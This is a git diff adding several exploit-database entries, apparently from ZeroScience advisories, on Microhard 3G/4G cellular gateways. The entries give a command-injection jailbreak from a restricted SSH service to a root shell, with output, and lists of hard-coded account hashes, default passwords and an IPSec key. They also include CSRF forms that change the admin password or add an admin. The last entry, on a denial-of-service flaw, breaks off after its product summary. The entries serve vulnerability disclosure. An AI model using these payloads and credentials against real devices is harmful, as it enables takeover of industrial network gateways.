diff --git a/exploits/hardware/local/45041.txt b/exploits/hardware/local/45041.txt
new file mode 100644
index 000000000..30ea47229
--- /dev/null
+++ b/exploits/hardware/local/45041.txt
@@ -0,0 +1,291 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: The web shell application includes a service called Microhard Sh that is documented
+only as 'reserved for internal use'. This service can be enabled by an authenticated
+user within the Services menu in the web admin panel. This can also be enabled via CSRF
+attack. When the service is enabled, a user 'msshc' is created on the system with password
+'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP
+jailed environment, that has limited commands for file transfer administration. One of the
+commands is a custom added 'ping' command that has a command injection vulnerability that
+allows the attacker to escape the restricted environment and enter into a root shell terminal
+that can execute commands as the root user. 
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5486
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php
+
+
+13.03.2018
+
+--
+
+
+1) Enable Microhard Sh service:
+-------------------------------
+
+http://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=start - Start the Microhard Sh (msshc) service
+http://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=enable - Auto-enable (auto-start)
+
+
+2) Check what happens when enabling Microhard Sh service:
+---------------------------------------------------------
+
+# cat /etc/init.d/msshc
+#!/bin/sh /etc/rc.common
+# Copyright (C) 2013 Microhardcorp
+
+start() {
+  deluser msshc
+  rm -rf /tmp/msshc
+  mkdir -p /tmp/msshc
+  msshcshell=$(cat /etc/shells | grep -c "/etc/msshc.sh")
+  [ $msshcshell -gt 0 ] || echo "/etc/msshc.sh" >> /etc/shells
+  passwd=$(/sbin/uci get msshc.general.passwd)
+  echo "$passwd" >> /etc/passwd
+}
+
+stop() {
+  deluser msshc
+  rm -rf /tmp/msshc
+}
+
+
+3) Check the /etc/msshc.sh script:
+----------------------------------
+
+# cat /etc/msshc.sh
+#!/bin/sh 
+# Copyright (C) 2013 Microhardcorp
+
+/usr/bin/ncftp
+
+exit 0
+
+
+4) Check the /sbin/uci binary:
+------------------------------
+
+Usage: /sbin/uci [<options>] <command> [<arguments>]
+
+Commands:
+    batch
+    export     [<config>]
+    import     [<config>]
+    changes    [<config>]
+    commit     [<config>]
+    add        <config> <section-type>
+    add_list   <config>.<section>.<option>=<string>
+    show       [<config>[.<section>[.<option>]]]
+    get        <config>.<section>[.<option>]
+    set        <config>.<section>[.<option>]=<value>
+    delete     <config>[.<section[.<option>]]
+    rename     <config>.<section>[.<option>]=<name>
+    revert     <config>[.<section>[.<option>]]
+
+Options:
+    -c <path>  set the search path for config files (default: /etc/config)
+    -d <str>   set the delimiter for list values in uci show
+    -f <file>  use <file> as input instead of stdin
+    -L         do not load any plugins
+    -m         when importing, merge data into an existing package
+    -n         name unnamed sections on export (default)
+    -N         don't name unnamed sections
+    -p <path>  add a search path for config change files
+    -P <path>  add a search path for config change files and use as default
+    -q         quiet mode (don't print error messages)
+    -s         force strict mode (stop on parser errors, default)
+    -S         disable strict mode
+    -X         do not use extended syntax on 'show'
+
+# /sbin/uci get msshc.general.passwd
+msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
+
+
+5) Check the NcFTP binary:
+--------------------------
+
+# /usr/bin/ncftp -h
+
+Usage:  ncftp [flags] [<host> | <directory URL to browse>]
+
+Flags:
+  -u XX  Use username XX instead of anonymous.
+  -p XX  Use password XX with the username.
+  -P XX  Use port number XX instead of the default FTP service port (21).
+  -j XX  Use account XX with the username (rarely needed).
+  -F     Dump a sample $HOME/.ncftp/firewall prefs file to stdout and exit.
+
+Program version:  NcFTP 3.2.5/474 Feb 02 2011, 05:13 PM
+Library version:  LibNcFTP 3.2.5 (January 17, 2011)
+Build system:     Linux DProBuilder 2.6.34.9-69.fc13.i686.PAE #1 SMP Tue Ma...
+
+This is a freeware program by Mike Gleason (http://www.NcFTP.com).
+A directory URL ends in a slash, i.e. ftp://ftp.freebsd.org/pub/FreeBSD/
+Use ncftpget and ncftpput for command-line FTP and file URLs.
+
+
+6) Go to jail:
+--------------
+
+lqwrm@metalgear:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 msshc@192.168.1.1
+The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
+RSA key fingerprint is SHA256:x9GG/Dlkg88058ilA2xyhYqllYRgZOTPu6reGS8K1Yg.
+Are you sure you want to continue connecting (yes/no)? yes
+Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
+msshc@192.168.1.1's password: 
+NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
+
+Copyright (c) 1992-2011 by Mike Gleason.
+All rights reserved.
+
+ncftp> ?
+Commands may be abbreviated.  'help showall' shows hidden and unsupported 
+commands.  'help <command>' gives a brief description of <command>.
+
+ascii    close    help     mkdir    put      rename   set      umask  
+binary   debug    lls      open     pwd      rhelp    show     
+cd       dir      lrm      passive  quit     rm       site     
+chmod    get      ls       ping     quote    rmdir    type     
+
+For details, please see the manual ("man ncftp" at your regular shell prompt
+or online at http://www.NcFTP.com/ncftp/doc/ncftp.html).
+ncftp> help showall
+Commands may be abbreviated.  'help showall' shows hidden and unsupported
+commands.  'help <command>' gives a brief description of <command>.
+
+?        chmod    exit     ls       mv       pwd      rhelp    site
+ascii    close    get      mget     open     quit     rm       type
+binary   debug    help     mkdir    passive  quote    rmdir    umask
+bye      delete   lls      mls      ping     rename   set
+cd       dir      lrm      mput     put      rglob    show
+
+For details, please see the manual ("man ncftp" at your regular shell prompt
+or online at http://www.NcFTP.com/ncftp/doc/ncftp.html).
+ncftp> ls
+ls: must be connected to do that.
+ncftp> man ncftp
+man: no such command.
+ncftp> pwd
+pwd: must be connected to do that.
+ncftp> show
+anon-password                  NcFTP@
+auto-ascii                     |.txt|.asc|.html|.htm|.css|.xml|.ini|.pl|.hqx|.cfg|.c|.h|.cpp|.hpp|.bat|.m3u|.pls|
+auto-resume                    no
+autosave-bookmark-changes      no
+confirm-close                  no
+connect-timeout                20
+control-timeout                135
+logsize                        10240
+pager                          more
+passive                        optional
+progress-meter                 2 (statbar)
+redial-delay                   20
+save-passwords                 ask
+show-status-in-xterm-titlebar  no
+so-bufsize                     0 (use system default)
+xfer-timeout                   3600
+yes-i-know-about-NcFTPd        no
+ncftp>
+
+
+7) The Shawshank Redemption:
+---------------------------- 
+
+ncftp> ping -c1 -4 0.0.0.0 `id` 
+BusyBox v1.15.3 (2016-06-20 14:58:14 MDT) multi-call binary
+
+Usage: ping [OPTIONS] HOST
+
+Send ICMP ECHO_REQUEST packets to network hosts
+
+Options:
+    -4, -6        Force IPv4 or IPv6 hostname resolution
+    -c CNT        Send only CNT pings
+    -s SIZE        Send SIZE data bytes in packets (default:56)
+    -I IFACE/IP    Use interface or IP address as source
+    -W SEC        Seconds to wait for the first response (default:10)
+            (after all -c CNT packets are sent)
+    -w SEC        Seconds until ping exits (default:infinite)
+            (can exit earlier with -c CNT)
+    -q        Quiet, only displays output at start
+            and when finished
+
+ncftp>
+
+
+8) Come on Andy:
+----------------
+
+ncftp> ping -c1 -4 0.0.0.0 && /bin/sh
+PING 0.0.0.0 (0.0.0.0): 56 data bytes
+64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.423 ms
+
+--- 0.0.0.0 ping statistics ---
+1 packets transmitted, 1 packets received, 0% packet loss
+round-trip min/avg/max = 0.423/0.423/0.423 ms
+
+
+BusyBox v1.15.3 (2016-06-20 14:58:14 MDT) built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+
+/tmp/msshc # id ; uname -r
+uid=0(root) gid=0(root)
+2.6.32.9
+/tmp/msshc #
\ No newline at end of file
diff --git a/exploits/hardware/remote/45040.txt b/exploits/hardware/remote/45040.txt
new file mode 100644
index 000000000..766044a7b
--- /dev/null
+++ b/exploits/hardware/remote/45040.txt
@@ -0,0 +1,99 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
+These sets of credentials are never exposed to the end-user and cannot be changed through
+any normal operation of the gateway. Another vulnerability could allow an authenticated
+attacker to gain root access. The vulnerability is due to default credentials. An attacker
+could exploit this vulnerability by logging in using the default credentials.
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5480
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php
+
+
+13.03.2018
+
+--
+
+
+System/Web/FTP:
+---------------
+root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
+admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:0:0:admin:/:/etc/m_cli/m_cli.sh
+upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
+at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
+nobody:*:65534:65534:nobody:/var:/bin/false
+testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
+testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
+msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
+
+upgrade:admin
+testlab:testlab
+testlab1:testlab1
+admin:admin
+msshc:msshc
+
+BCLC config defaults:
+---------------------
+IPSec preshared key: DerekUsedThisSecureKeyToEncryptClientAccessIn2014
+Access control user/pass: admin:5@lm0nIsG00d
+NMS System setting pass: NotComplicated
+Webclient setting user/pass: webclient:AlsoNotComplicated
+System access control user/pass: readonly:ItIsAlmostFriday
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45034.html b/exploits/hardware/webapps/45034.html
new file mode 100644
index 000000000..2afd57d8b
--- /dev/null
+++ b/exploits/hardware/webapps/45034.html
@@ -0,0 +1,238 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
+any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
+It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
+
+Desc: The application interface allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests. This can be exploited to
+perform certain actions with administrative privileges if a logged-in user visits a malicious
+web site.
+
+Tested on: httpd-ssl-1.0.0
+           Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5478
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php
+
+
+13.03.2018
+
+--
+
+
+CSRF Change Admin password:
+---------------------------
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="submit" value="1" />
+      <input type="hidden" name="pw1" value="nimda" />
+      <input type="hidden" name="pw2" value="nimda" />
+      <input type="hidden" name="passwdchange" value=" Change Passwd " />
+      <input type="hidden" name="user_add" value="" />
+      <input type="hidden" name="password_add" value="" />
+      <input type="hidden" name="password2_add" value="" />
+      <input type="hidden" name="Carrier_enable" value="0" />
+      <input type="hidden" name="Carrier_Status" value="0" />
+      <input type="hidden" name="Carrier_Settings" value="0" />
+      <input type="hidden" name="Carrier_Keepalive" value="0" />
+      <input type="hidden" name="Carrier_TrafficWatchdog" value="0" />
+      <input type="hidden" name="Carrier_DynamicDNS" value="0" />
+      <input type="hidden" name="Carrier_SMSConfig" value="0" />
+      <input type="hidden" name="Carrier_SMS" value="0" />
+      <input type="hidden" name="Carrier_DataUsage" value="0" />
+      <input type="hidden" name="Comport_enable" value="0" />
+      <input type="hidden" name="Comport_Status" value="0" />
+      <input type="hidden" name="Comport_Com0" value="0" />
+      <input type="hidden" name="Comport_Com1" value="0" />
+      <input type="hidden" name="Firewall_enable" value="0" />
+      <input type="hidden" name="Firewall_Status" value="0" />
+      <input type="hidden" name="Firewall_General" value="0" />
+      <input type="hidden" name="Firewall_Rules" value="0" />
+      <input type="hidden" name="Firewall_PortForwarding" value="0" />
+      <input type="hidden" name="Firewall_MACIPList" value="0" />
+      <input type="hidden" name="Firewall_Reset" value="0" />
+      <input type="hidden" name="GPS_enable" value="0" />
+      <input type="hidden" name="GPS_Location" value="0" />
+      <input type="hidden" name="GPS_Settings" value="0" />
+      <input type="hidden" name="GPS_Report" value="0" />
+      <input type="hidden" name="GPS_GpsGate" value="0" />
+      <input type="hidden" name="GPS_Recorder" value="0" />
+      <input type="hidden" name="GPS_LoadRecord" value="0" />
+      <input type="hidden" name="I/O_enable" value="0" />
+      <input type="hidden" name="I/O_Status" value="0" />
+      <input type="hidden" name="I/O_OUTPUT" value="0" />
+      <input type="hidden" name="Network_enable" value="0" />
+      <input type="hidden" name="Network_Status" value="0" />
+      <input type="hidden" name="Network_LAN" value="0" />
+      <input type="hidden" name="Network_Routes" value="0" />
+      <input type="hidden" name="Network_GRE" value="0" />
+      <input type="hidden" name="Network_PIMSM" value="0" />
+      <input type="hidden" name="Network_SNMP" value="0" />
+      <input type="hidden" name="Network_sdpServer" value="0" />
+      <input type="hidden" name="Network_LocalMonitor" value="0" />
+      <input type="hidden" name="Network_Port" value="0" />
+      <input type="hidden" name="System_enable" value="0" />
+      <input type="hidden" name="System_Settings" value="0" />
+      <input type="hidden" name="System_AccessControl" value="0" />
+      <input type="hidden" name="System_Services" value="0" />
+      <input type="hidden" name="System_Maintenance" value="0" />
+      <input type="hidden" name="System_Reboot" value="0" />
+      <input type="hidden" name="Tools_enable" value="0" />
+      <input type="hidden" name="Tools_Discovery" value="0" />
+      <input type="hidden" name="Tools_NetflowReport" value="0" />
+      <input type="hidden" name="Tools_NMSSettings" value="0" />
+      <input type="hidden" name="Tools_EventReport" value="0" />
+      <input type="hidden" name="Tools_Modbus" value="0" />
+      <input type="hidden" name="Tools_Websocket" value="0" />
+      <input type="hidden" name="Tools_SiteSurvey" value="0" />
+      <input type="hidden" name="Tools_Ping" value="0" />
+      <input type="hidden" name="Tools_TraceRoute" value="0" />
+      <input type="hidden" name="Tools_NetworkTraffic" value="0" />
+      <input type="hidden" name="VPN_enable" value="0" />
+      <input type="hidden" name="VPN_Summary" value="0" />
+      <input type="hidden" name="VPN_GatewayToGateway" value="0" />
+      <input type="hidden" name="VPN_ClientToGateway" value="0" />
+      <input type="hidden" name="VPN_VPNClientAccess" value="0" />
+      <input type="hidden" name="VPN_CertificateManagement" value="0" />
+      <input type="hidden" name="VPN_CiscoEasyVPNClient" value="0" />
+      <input type="submit" value="Change" />
+    </form>
+  </body>
+</html>
+
+
+CSRF Add Admin:
+---------------
+
+<html>
+  <body>
+    <form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="submit" value="1" />
+      <input type="hidden" name="pw1" value="" />
+      <input type="hidden" name="pw2" value="" />
+      <input type="hidden" name="user_add" value="testingus" />
+      <input type="hidden" name="password_add" value="123456" />
+      <input type="hidden" name="password2_add" value="123456" />
+      <input type="hidden" name="Carrier_enable" value="1" />
+      <input type="hidden" name="Carrier_Status" value="1" />
+      <input type="hidden" name="Carrier_Settings" value="1" />
+      <input type="hidden" name="Carrier_Keepalive" value="1" />
+      <input type="hidden" name="Carrier_TrafficWatchdog" value="1" />
+      <input type="hidden" name="Carrier_DynamicDNS" value="1" />
+      <input type="hidden" name="Carrier_SMSConfig" value="1" />
+      <input type="hidden" name="Carrier_SMS" value="1" />
+      <input type="hidden" name="Carrier_DataUsage" value="1" />
+      <input type="hidden" name="Comport_enable" value="1" />
+      <input type="hidden" name="Comport_Status" value="1" />
+      <input type="hidden" name="Comport_Com0" value="1" />
+      <input type="hidden" name="Comport_Com1" value="1" />
+      <input type="hidden" name="Firewall_enable" value="1" />
+      <input type="hidden" name="Firewall_Status" value="1" />
+      <input type="hidden" name="Firewall_General" value="1" />
+      <input type="hidden" name="Firewall_Rules" value="1" />
+      <input type="hidden" name="Firewall_PortForwarding" value="1" />
+      <input type="hidden" name="Firewall_MACIPList" value="1" />
+      <input type="hidden" name="Firewall_Reset" value="1" />
+      <input type="hidden" name="GPS_enable" value="1" />
+      <input type="hidden" name="GPS_Location" value="1" />
+      <input type="hidden" name="GPS_Settings" value="1" />
+      <input type="hidden" name="GPS_Report" value="1" />
+      <input type="hidden" name="GPS_GpsGate" value="1" />
+      <input type="hidden" name="GPS_Recorder" value="1" />
+      <input type="hidden" name="GPS_LoadRecord" value="1" />
+      <input type="hidden" name="I/O_enable" value="1" />
+      <input type="hidden" name="I/O_Status" value="1" />
+      <input type="hidden" name="I/O_OUTPUT" value="1" />
+      <input type="hidden" name="Network_enable" value="1" />
+      <input type="hidden" name="Network_Status" value="1" />
+      <input type="hidden" name="Network_LAN" value="1" />
+      <input type="hidden" name="Network_Routes" value="1" />
+      <input type="hidden" name="Network_GRE" value="1" />
+      <input type="hidden" name="Network_PIMSM" value="1" />
+      <input type="hidden" name="Network_SNMP" value="1" />
+      <input type="hidden" name="Network_sdpServer" value="1" />
+      <input type="hidden" name="Network_LocalMonitor" value="1" />
+      <input type="hidden" name="Network_Port" value="1" />
+      <input type="hidden" name="System_enable" value="1" />
+      <input type="hidden" name="System_Settings" value="1" />
+      <input type="hidden" name="System_AccessControl" value="1" />
+      <input type="hidden" name="System_Services" value="1" />
+      <input type="hidden" name="System_Maintenance" value="1" />
+      <input type="hidden" name="System_Reboot" value="1" />
+      <input type="hidden" name="Tools_enable" value="1" />
+      <input type="hidden" name="Tools_Discovery" value="1" />
+      <input type="hidden" name="Tools_NetflowReport" value="1" />
+      <input type="hidden" name="Tools_NMSSettings" value="1" />
+      <input type="hidden" name="Tools_EventReport" value="1" />
+      <input type="hidden" name="Tools_Modbus" value="1" />
+      <input type="hidden" name="Tools_Websocket" value="1" />
+      <input type="hidden" name="Tools_SiteSurvey" value="1" />
+      <input type="hidden" name="Tools_Ping" value="1" />
+      <input type="hidden" name="Tools_TraceRoute" value="1" />
+      <input type="hidden" name="Tools_NetworkTraffic" value="1" />
+      <input type="hidden" name="VPN_enable" value="1" />
+      <input type="hidden" name="VPN_Summary" value="1" />
+      <input type="hidden" name="VPN_GatewayToGateway" value="1" />
+      <input type="hidden" name="VPN_ClientToGateway" value="1" />
+      <input type="hidden" name="VPN_VPNClientAccess" value="1" />
+      <input type="hidden" name="VPN_CertificateManagement" value="1" />
+      <input type="hidden" name="VPN_CiscoEasyVPNClient" value="1" />
+      <input type="hidden" name="mhadd_user" value="Add User" />
+      <input type="submit" value="Request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45035.txt b/exploits/hardware/webapps/45035.txt
new file mode 100644
index 000000000..bf91b1fb4
--- /dev/null
+++ b/exploits/hardware/webapps/45035.txt
@@ -0,0 +1,114 @@
+Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS
+
+
+Vendor: Microhard Systems Inc.
+Product web page: http://www.microhardcorp.com
+Affected version: IPn4G 1.1.0 build 1098
+                  IPn3Gb 2.2.0 build 2160
+                  IPn4Gb 1.1.6 build 1184-14
+                  IPn4Gb 1.1.0 Rev 2 build 1090-2
+                  IPn4Gb 1.1.0 Rev 2 build 1086
+                  Bullet-3G 1.2.0 Rev A build 1032
+                  VIP4Gb 1.1.6 build 1204
+                  VIP4G 1.1.6 Rev 3.0 build 1184-14
+                  VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
+                  IPn3Gii / Bullet-3G 1.2.0 build 1076
+                  IPn4Gii / Bullet-LTE 1.2.0 build 1078
+                  BulletPlus 1.3.0 build 1036
+                  Dragon-LTE 1.1.0 build 1036
+
+Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
+using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
+features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
+Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
+RS232/485/422 devices!
+
+The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
+the widespread deployment of cellular network infrastructure for critical data collection.
+From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
+The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
+provides robust and secure wireless communication of Serial, USB and Ethernet data.
+
+The all new Bullet-3G provides a compact, robust, feature packed industrial strength
+wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
+to the next level by providing features such as Ethernet with PoE, RS232 Serial port
+and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
+Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
+worth looking at!
+
+The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
+wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
+cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
+system integration and design flexibility with dual Ethernet Ports and high power
+802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
+Control Lists, the Dragon-LTE provides a solution for any cellular application!
+
+The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
+network infrastructure for critical data communications. The VIP4Gb provides simultaneous
+network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
+I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
